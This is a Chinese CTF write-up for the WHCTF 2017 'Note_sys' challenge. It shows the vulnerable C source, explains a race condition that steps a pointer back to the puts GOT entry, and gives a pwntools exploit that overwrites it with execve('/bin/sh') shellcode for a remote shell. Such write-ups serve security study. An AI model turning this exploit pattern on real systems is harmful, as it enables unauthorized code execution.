XCTF 4th-WHCTF-2017——Note_sys

64位程序,没有开启NX  #条件竞争


  1 #include <stdio.h>
  2 #include <stdlib.h>
  3 #include <unistd.h>
  4 #include <pthread.h>
  5 #include <time.h>
  6 #include <string.h>
  8 char *notes[36];
  9 int count = 0;
 10 char **note_to_write = notes;
 11 void *malloc_func(void *arg)
 12 {
 13     note_to_write ++;
 14     int tmp = count;
 15     char *to_copy = (char *)arg;
 16     tmp += 1;
 17     //usleep(100000);
 18     count = tmp;
 19     if(count > 34)
 20     {
 21         printf("too many notes!!\n");
 22         note_to_write --;
 23         return 0;
 24     }
 25     else
 26     {
 27         printf("logged successfully!\n");
 28         *note_to_write = malloc(256 * sizeof(char));
 29         memset(*note_to_write, 0, 256);
 30         memcpy(*note_to_write, to_copy, 250);
 31         return 0;
 32     }
 33 }
 34 void *delete_func(void *arg)
 35 {
 36     char **note_to_delete = note_to_write;
 37     note_to_write --;
 38     int tmp = count;
 39     tmp -= 1;
 40     usleep(2000000);
 41     if(count > 0)
 42     {
 43         free(*note_to_delete);
 44         count = tmp;
 45         printf("delete successfully!\n");
 46     }
 47     else
 48     {
 49         printf("too less notes!!\n");
 50         note_to_write ++;
 51         return 0;
 52     }
 53     return 0;
 54 }
 56 int make_note()
 57 {
 58     int cnt = 250;
 59     char inputs[256];
 60     char *ptr = inputs;
 61     memset(inputs, 0, 256);
 62     printf("input your note, no more than 250 characters\n");
 63     while(cnt)
 64     {
 65         char tmp;
 66         tmp = getchar();
 67         if(tmp != '\n' && tmp!= '\x00' && tmp != '\x90' && tmp )
 68         {
 69             *ptr = tmp;
 70             *ptr ++;
 71         }
 72         else
 73         {
 74             ptr = NULL;
 75             break;
 76         }
 77         cnt --;
 78     }
 79     pthread_t thread_tmp;
 80     pthread_create(&thread_tmp, NULL, malloc_func, (void*)inputs );
 81     return 0;
 82 }
 83 int get_total()
 84 {
 85     printf("the total of notes is %ld\n",count);
 86     //printf("real : %ld\n",note_to_write - notes);
 87 }
 88 int delete_note()
 89 {
 90     printf("the last one will be deleted!\n");
 91     pthread_t thread_tmp;
 92     pthread_create(&thread_tmp, NULL, delete_func, NULL);
 93     return 0;
 94 }
 96 int welcome()
 97 {
 98     char choice = '3';
 99     printf("welcome to flappypig's note system!\n");
100     printf("enter 0 to make a new note\n");
101     printf("enter 1 to get the total of notes\n");
102     printf("enter 2 to delete a note\n");
103     printf("enter 3 to exit\n");
104     printf("choice:\n");
105     while(1)
106     {
107         while(1)
108         {
109             char tmp = getchar();
110             if(tmp == '\n')
111             {
112                 break;
113             }
114             else if(tmp == EOF)
115             {
116                 return 0;
117             }
118             else
119             {
120                 choice = tmp;
121             }
122         }
123         switch (choice)
124         {
125             case '0':
126                 make_note();
127                 break;
128             case '1':
129                 get_total();
130                 break;
131             case '2':
132                 delete_note();
133                 break;
134             case '3':
135                 return 0;
136                 break;
137             default :
138                 printf("please enter the right choice!\n");
139                 break;
140         }
141         printf("choice:\n");
142     }
143 }
145 int main()
146 {
147     memset(&notes,0,36 * sizeof(char *));
148     welcome();
149     return 0;

多线程程序,delete_func函数中free之前会usleep(20000) ,会造成条件竞争



ida中查看,puts_got在notes-19*8处,所以我们只要先delete_note20次,让note_to_write-- 20次,指向puts_got-8处,然后malloc_note,note_to_write++便指向了puts_got,之后便可以输入shellcode覆盖got表了。


 1 from pwn import *
 2 sh=remote('',43174)
 3 elf=ELF('./note_sys')
 4 context.arch='amd64'
 5 context.os='linux'
 6 context.endian='little'
 7 context.word_size=64
 8 i=20
 9 while(i>0):
10     i-=1
11     sh.recvuntil('choice:\n')
12     sh.sendline('2')
14 sh.recvuntil('choice:\n')
15 payload=asm(shellcraft.amd64.linux.execve("/bin/sh"))
16 print payload
17 sh.sendline('0')
18 sh.recvuntil('input your note, no more than 250 characters\n')
19 sh.sendline(payload)
20 sh.interactive()

